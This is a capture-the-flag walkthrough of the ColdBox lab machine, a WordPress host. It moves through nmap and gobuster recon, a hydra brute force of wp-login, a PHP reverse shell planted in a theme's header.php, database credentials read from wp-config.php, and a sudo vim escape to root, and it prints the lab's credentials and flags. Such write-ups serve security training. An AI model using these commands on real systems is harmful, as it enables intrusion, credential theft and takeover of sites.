.png)
🔗 ColdBox
🎯 Target IP: 10.10.100.105
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
su
echo "10.10.100.105 coldbox.thm" >> /etc/hosts
mkdir thm/coldbox.thm
cd thm/coldbox.thm
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 coldbox.thm
PING coldbox.thm (10.10.100.105) 56(84) bytes of data.
64 bytes from coldbox.thm (10.10.100.105): icmp_seq=1 ttl=63 time=65.4 ms
64 bytes from coldbox.thm (10.10.100.105): icmp_seq=2 ttl=63 time=61.1 ms
64 bytes from coldbox.thm (10.10.100.105): icmp_seq=3 ttl=63 time=60.5 msSending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.
Of course, start to check information scanning open ports:
nmap --open -p0- -n -Pn -vvv --min-rate 5000 coldbox.thm -oG nmap/port_scanPORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 63
4512/tcp open unknown syn-ack ttl 63| command | result |
|---|---|
| sudo | run as root |
| sC | run default scripts |
| sV | enumerate versions |
| A | aggressive mode |
| T4 | run a bit faster |
| oN | output to file with nmap formatting |
It looks like there are 2 open ports on the machine: 80, 4512
Now, we need to search which services are running on open ports:
nmap -p80,4512 -n -Pn -vvv -sCV --min-rate 5000 coldbox.thm -oN nmap/open_portPORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ColddBox | One more machine
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
4512/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDngxJmUFBAeIIIjZkorYEp5ImIX0SOOFtRVgperpxbcxDAosq1rJ6DhWxJyyGo3M+Fx2koAgzkE2d4f2DTGB8sY1NJP1sYOeNphh8c55Psw3Rq4xytY5u1abq6su2a1Dp15zE7kGuROaq2qFot8iGYBVLMMPFB/BRmwBk07zrn8nKPa3yotvuJpERZVKKiSQrLBW87nkPhPzNv5hdRUUFvImigYb4hXTyUveipQ/oji5rIxdHMNKiWwrVO864RekaVPdwnSIfEtVevj1XU/RmG4miIbsy2A7jRU034J8NEI7akDB+lZmdnOIFkfX+qcHKxsoahesXziWw9uBospyhB
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKNmVtaTpgUhzxZL3VKgWKq6TDNebAFSbQNy5QxllUb4Gg6URGSWnBOuIzfMAoJPWzOhbRHAHfGCqaAryf81+Z8=
| 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE/fNq/6XnAxR13/jPT28jLWFlqxd+RKSbEgujEaCjEc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThen we can start to see website (port 80):
.png)
we can see that's a wordpress web site, then we can try to see page source for checking information disclosure.
.png)
but we don't find precious info.
Another good thing to do, is find hidden paths on website using gobuster
gobuster dir -u coldbox.thm -w /usr/share/wordlists/dirb/common.txt
.png)
Very good, we can start to check these web dir:
/hidden/
.png)
Very good, there're precious info about usernames: C0ldd, Hugo and Philip.
We can confirm it watching error message at login in a default login path for wordpress: /wp-admin/
.png)
Finally the's another good info
.png)
If we don't waste time, we can use wpscan to find user list, but we'll take it if we take results with our three users, then try to login with C0ldd/Hugo/Philip:password123 (what we've see in the hidden path).
Nothing to do, we need to use brute force attack.
Then, we save them in a file called users.txt, and run hydra with a password wordlist to take a brute force attack:
echo "C0ldd\nHugo\nPhilip" > users.txt
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt coldbox.thm -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'.png)
{% hint style="info" %} C0ldd:9876543210 {% endhint %}
Now we can use this credentials to log in wordpress and ssh.
.png)
Check user list, to see them and theirs role/permissions:
.png)
Very good, C0ldd is administrator.
Now, we need to access at machine using web shell, find it on our kali web-shells folder or use pentester monkey website:
.png)
We need to edit it using our credentials (LHOST and LPORT):
.png)
and upload it on media library page:
.png)
But, trying to change extension, upload doesn't work.
.png)
Then, we can try to use wordpress themes or plugins how vector to inject our web-shell.
Starting with themes, we edit header.php page in the twentyfifteen theme using the same php web-shell:
.png)
Update file, run netcat listener on the same port '1234':
.png)
Go to: http://coldbox.thm/wp-content/themes/twentyfifteen/header.php
.png)
We can upgrade this to a fully interactive shell by running:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xtermand retrieve credentials inside wp-config.php file.
cat /var/www/html/wp-config.php | grep "DB_USER"
#define('DB_USER', 'c0ldd');
cat /var/www/html/wp-config.php | grep "DB_PASSWORD"
#define('DB_PASSWORD', 'cybersecurity');
su c0ldd #inser psw and read flag.we know credential for access how c0ldd user and read user.txt flag
🚩 Flag 1 (user.txt)
RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==
We can do sudo -l command to discover user's permissions.
.png)
We see that c0ldd user has root permissions for these commands, we can use gtfobins to find them.
https://gtfobins.github.io/gtfobins/vim/ using vim sudo command below, we obtain a root permission:
sudo vim -c ':!/bin/sh'.png)
spawn /bin/sh to use shell:
.png)
Well done! Root flag found!
🚩 Flag 2 (root.txt)
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=